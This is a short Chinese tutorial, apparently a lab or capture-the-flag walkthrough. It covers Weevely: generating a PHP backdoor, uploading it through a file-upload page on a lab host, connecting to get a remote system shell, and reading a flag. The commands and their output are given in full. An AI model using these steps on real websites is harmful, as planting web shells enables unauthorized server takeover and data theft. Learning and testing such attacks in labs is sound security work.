Weevely php后门木马上传使用

基本用法

root@kali:~# weevely 
[+] weevely 3.2.0
[!] Error: too few arguments
[+] Run terminal to the target
    wevely <URL> <password> [cmd]
[+] Load session file
    weevely session <path> [cmd]
[+] Generate backdoor agent
weevely generate <password> <path>

生成一个后门木马:

root@kali:~# weevely generate test hello.php
Generated backdoor with password 'test' in 'hello.php' of 1486 byte size.
root@kali:~# find / -name hello.php
/usr/share/weevely/hello.php

连接后门:

root@kali:~# weevely http://192.168.110.129/hello.php test
[+] weevely 3.2.0
[+] Target:	winxp-0947be9ad:C:\phpstudy\WWW 
[+] Session:	/root/.weevely/sessions/192.168.110.129/hello_0.session
[+] Shell:	System shell
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> 

Web文件上传模拟测试(Yueda环境)
56317-76i5ckc5wkt.png
网站目录文件
/filesharing.php为文件上传网页
48563-38hdlvzv5tx.png
使用weevely生成后门,连接密码为test,生成文件hello.php
98489-mcqbd710gt9.png
选择文件上传
74617-dqjab5cnyki.png
连接后门,格式
Weevely.py http文件路径 连接密码
16810-f3wifo8z87.png
Cat 获取到flag值
89688-orinl93j1vr.png